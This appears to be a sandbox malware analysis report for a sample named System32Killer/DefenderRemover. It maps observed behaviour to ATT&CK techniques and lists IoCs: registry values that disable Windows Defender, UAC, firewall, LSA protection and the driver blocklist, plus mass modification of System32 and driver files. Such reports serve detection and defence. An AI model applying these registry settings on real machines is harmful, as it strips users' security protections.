8e25cd2951ea7e8336eb1fb648c9935c3eab6496b60f4db1b8652e0e3b7e4bcd

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\IOAVMaxSize = "1298"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\IOAVMaxSize = "1298"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1"	regedit.exe

Modifies firewall policy service 3 TTPs 4 IoCs

evasion

Modify Registry

Windows Service

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System	regedit.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	regedit.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	regedit.exe

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe

Windows security bypass 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\FirewallOverride = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	regedit.exe

Downloads MZ/PE file

Drops file in Drivers directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\NdisImPlatform.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mcd.sys	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\WdmCompanionFilter.sys	System32Killer.exe
File opened for modification	C:\Windows\system32\drivers\Rtnic64.sys	cmd.exe
File opened for modification	C:\Windows\system32\drivers\UMDF\en-US\SensorsHid.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rfcomm.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\mssmbios.sys.mui	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\en-US\SensorsCx.dll.mui	System32Killer.exe
File opened for modification	C:\Windows\system32\drivers\netvsc.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbehci.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\storahci.sys	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\dxgkrnl.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\nwifi.sys.mui	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\en-US\qwavedrv.sys.mui	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\applockerfltr.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\xboxgip.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\hidclass.sys.mui	System32Killer.exe
File opened for modification	C:\Windows\system32\drivers\V9CGJW~1.SYS	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vhdmp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\winhvr.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbprint.sys	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\en-US\scsiport.sys.mui	System32Killer.exe
File opened for modification	C:\Windows\system32\drivers\Dmpusbstor.sys	cmd.exe
File opened for modification	C:\Windows\system32\drivers\hyperkbd.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\mssmbios.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\agilevpn.sys	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\rootmdm.sys	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\en-US\fvevol.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\WUDFRd.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbccgp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\scfilter.sys.mui	System32Killer.exe
File opened for modification	C:\Windows\system32\drivers\en-US\IndirectKmd.sys.mui	cmd.exe
File opened for modification	C:\Windows\system32\drivers\en-US\tcpip.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\acpi.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\volmgr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fltMgr.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mouhid.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\sermouse.sys	System32Killer.exe
File opened for modification	C:\Windows\system32\drivers\sermouse.sys	cmd.exe
File opened for modification	C:\Windows\system32\drivers\UevAgentDriver.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\ndiscap.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mpsdrv.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rdpbus.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\pmem.sys.mui	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\ataport.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\SgrmAgent.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rdyboost.sys	System32Killer.exe
File opened for modification	C:\Windows\system32\drivers\rasl2tp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\mup.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\BtaMPM.sys	System32Killer.exe
File opened for modification	C:\Windows\system32\drivers\appid.sys	cmd.exe
File opened for modification	C:\Windows\system32\drivers\errdev.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\hyperkbd.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\en-US\mgtdyn.dll.mui	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\en-US\MTConfig.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vpci.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\ndisuio.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\TsUsbFlt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\SMCCx.dll	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbd.sys	System32Killer.exe
File opened for modification	C:\Windows\system32\drivers\exfat.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\USBHUB3.SYS	System32Killer.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\SensorsCx.dll	cmd.exe
File opened for modification	C:\Windows\System32\drivers\dxgkrnl.sys	cmd.exe

Manipulates Digital Signatures 8 IoCs

Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

description	ioc	Process
File opened for modification	C:\Windows\system32\WindowsPowerShell\v1.0\pwrshsip.dll	cmd.exe
File opened for modification	C:\Windows\system32\wintrust.dll	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll	cmd.exe
File opened for modification	C:\Windows\System32\wintrust.dll	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll	cmd.exe
File opened for modification	C:\Windows\System32\wintrust.dll	cmd.exe
File opened for modification	C:\Windows\System32\wintrust.dll	System32Killer.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll	System32Killer.exe

Modify Registry: Disable Windows Driver Blocklist 2 TTPs 1 IoCs

Disable Windows Driver Blocklist via Registry.

defense_evasion

Modify Registry

persistence credential_access

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config\VulnerableDriverBlocklistEnable = "0"	regedit.exe

Boot or Logon Autostart Execution: LSASS Driver 2 TTPs 1 IoCs

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems.

LSASS Driver

T1547.008

LSASS Memory

T1003.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\RunAsPPL = "0"	regedit.exe

Boot or Logon Autostart Execution: Print Processors 1 TTPs 4 IoCs

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.

persistence

Print Processors

T1547.012

description	ioc	Process
File opened for modification	C:\Windows\System32\spool\prtprocs\x64\winprint.dll	cmd.exe
File opened for modification	C:\Windows\System32\spool\prtprocs\x64\winprint.dll	cmd.exe
File opened for modification	C:\Windows\System32\spool\prtprocs\x64\winprint.dll	System32Killer.exe
File opened for modification	C:\Windows\system32\spool\prtprocs\x64\winprint.dll	cmd.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
2232	System32Killer.exe
5028	DefenderRemover.exe
3128	PowerRun.exe
3228	PowerRun.exe
728	PowerRun.exe
1600	PowerRun.exe
1260	PowerRun.exe
4396	PowerRun.exe
4568	PowerRun.exe
4060	PowerRun.exe
1704	PowerRun.exe
3316	PowerRun.exe
4132	PowerRun.exe
3076	dismhost.exe
1160	PowerRun.exe
3632	PowerRun.exe
4712	PowerRun.exe
4436	PowerRun.exe
1540	PowerRun.exe
892	PowerRun.exe
1616	PowerRun.exe
1676	PowerRun.exe
2512	PowerRun.exe
5116	PowerRun.exe
2292	PowerRun.exe
4464	PowerRun.exe
3352	PowerRun.exe
3660	PowerRun.exe
2704	PowerRun.exe
3228	PowerRun.exe
2640	PowerRun.exe
1232	PowerRun.exe
3916	PowerRun.exe
3312	PowerRun.exe
2796	PowerRun.exe
4688	PowerRun.exe
4396	PowerRun.exe
1296	PowerRun.exe
4672	PowerRun.exe
4892	PowerRun.exe
3580	PowerRun.exe
1680	PowerRun.exe
512	PowerRun.exe
5072	PowerRun.exe
3604	PowerRun.exe
4944	PowerRun.exe
1620	PowerRun.exe
5088	PowerRun.exe
3856	PowerRun.exe
4464	PowerRun.exe
4552	PowerRun.exe
4908	PowerRun.exe
1760	PowerRun.exe
3268	PowerRun.exe
1968	PowerRun.exe
3484	PowerRun.exe
5092	PowerRun.exe
220	PowerRun.exe
1704	PowerRun.exe
2356	PowerRun.exe
3540	PowerRun.exe
1960	PowerRun.exe
928	PowerRun.exe
4892	PowerRun.exe

Loads dropped DLL 63 IoCs

pid	Process
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
2232	System32Killer.exe
3076	dismhost.exe
3076	dismhost.exe
3076	dismhost.exe
3076	dismhost.exe
3076	dismhost.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

Possible Turn off User Account Control's privilege elevation for standard users.

defense_evasion persistence privilege_escalation

Executable Installer File Permissions Weakness

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	regedit.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
167	raw.githubusercontent.com
169	raw.githubusercontent.com

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
1232	powershell.exe
4344	powershell.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\en-US\djctq.rs.mui	cmd.exe
File opened for modification	C:\Windows\System32\socialapis.dll	cmd.exe
File opened for modification	C:\Windows\System32\HologramCompositor.dll	cmd.exe
File opened for modification	C:\Windows\System32\DDACLSys.dll	System32Killer.exe
File opened for modification	C:\Windows\System32\dmxmlhelputils.dll	System32Killer.exe
File opened for modification	C:\Windows\System32\uk-UA\DaOtpCredentialProvider.dll.mui	System32Killer.exe
File opened for modification	C:\Windows\system32\dpapiprovider.dll	cmd.exe
File opened for modification	C:\Windows\System32\autopilot.dll	cmd.exe
File opened for modification	C:\Windows\System32\TetheringStation.dll	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSISession.cdxml	cmd.exe
File opened for modification	C:\Windows\System32\DismApi.dll	System32Killer.exe
File opened for modification	C:\Windows\System32\elshyph.dll	System32Killer.exe
File opened for modification	C:\Windows\System32\es-ES\Wwanpref.dll.mui	System32Killer.exe
File opened for modification	C:\Windows\system32\enterprisecsps.dll	cmd.exe
File opened for modification	C:\Windows\System32\enrollmentapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\spp\tokens\skus\ENTERP~1\Enterprise-Volume-CSVLK-3-pl-rtm.xrm-ms	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\virtdisk.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\en-US\netjoin.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\zh-CN\SyncRes.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\MusNotificationUx.exe.mui	System32Killer.exe
File opened for modification	C:\Windows\System32\DriverStore\it-IT\c_camera.inf_loc	System32Killer.exe
File opened for modification	C:\Windows\System32\de-DE\alg.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\Speech\SpeechUX\en-US\sapi.cpl.mui	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\energytask.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\srmshell.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\wbem\MMFUtil.dll	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\cdosys.dll.mui	System32Killer.exe
File opened for modification	C:\Windows\system32\it-IT\MSWMDM.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\en-US\tsmf.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\pt-PT\Windows.Media.Speech.UXRes.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\NT2B13~1.INF\ntprint.cat	cmd.exe
File opened for modification	C:\Windows\system32\migwiz\replacementmanifests\UPnPSSDP-Server-Replacement.man	cmd.exe
File opened for modification	C:\Windows\system32\wpnapps.dll	cmd.exe
File opened for modification	C:\Windows\system32\en-US\netcfg.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\dmenterprisediagnostics.dll.mui	System32Killer.exe
File opened for modification	C:\Windows\System32\uk-UA\pautoenr.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\sdbus.inf_amd64_55c0c78952233d0c\dumpsd.sys	System32Killer.exe
File opened for modification	C:\Windows\system32\wbem\qoswmi_uninstall.mof	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\nlahc.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\DWrite.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\wbem\mstscax.mof	System32Killer.exe
File opened for modification	C:\Windows\system32\uk-UA\PCPKsp.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\RemoveDeviceContextHandler.dll.mui	cmd.exe
File opened for modification	C:\Windows\system32\uk-UA\RdpSa.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\acpipagr.inf_amd64_a3248d35e6aba0f3\acpipagr.inf	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\ja-JP\msgpiowin32.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\iassam.dll	System32Killer.exe
File opened for modification	C:\Windows\system32\DriverStore\ja-JP\wstorvsc.inf_loc	cmd.exe
File opened for modification	C:\Windows\system32\it-IT\keyiso.dll.mui	cmd.exe
File opened for modification	C:\Windows\system32\en-US\runonce.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\en-US\AppointmentApis.dll.mui	cmd.exe
File opened for modification	C:\Windows\system32\DriverStore\de-DE\netrtl64.inf_loc	cmd.exe
File opened for modification	C:\Windows\system32\DriverStore\en-US\WindowsTrustedRTProxy.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\mmcbase.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\repair-bde.exe.mui	cmd.exe
